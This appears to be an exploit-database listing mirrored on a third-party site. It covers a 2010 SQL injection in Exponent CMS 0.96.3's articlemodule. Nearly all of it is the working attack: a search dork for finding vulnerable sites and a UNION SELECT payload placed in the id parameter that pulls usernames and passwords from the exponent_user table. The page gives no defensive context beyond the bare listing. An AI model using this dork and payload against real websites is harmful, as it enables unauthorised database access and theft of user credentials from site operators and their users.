[] NeoSense
E X P L O I T S
title author type platform port cve id

Exponent CMS 0.96.3 - 'articlemodule' SQL Injection

Author: T u R c O
type: webapps
platform: php
port: 
date_added: 2010-02-06 
date_updated:  
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comexponent-0.97.0-Beta20080611.zip
Exponent CMS 0.96.3 (articlemodule) Sql Injection Vulnerability
========================================================

####################################################################
# Author : T u R c O
# Home   : www.1923Turk.com
# Script : exponentcms
# Dork: "Welcome to Exponent CMS" | "my new exponent site"  inurl:articlemodule


####################################################################

===[ Exploit ]===

http://server/index.php?action=view_article&module=articlemodule&id= SQL INJECTION

  -1+union+select+1,2,3,password,username,6+from+exponent_user--

Demo:

http:/server/index.php?action=view_article&module=articlemodule&id=-1+union+select+1,2,3,password,username,6+from+exponent_user--


####################################################################
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.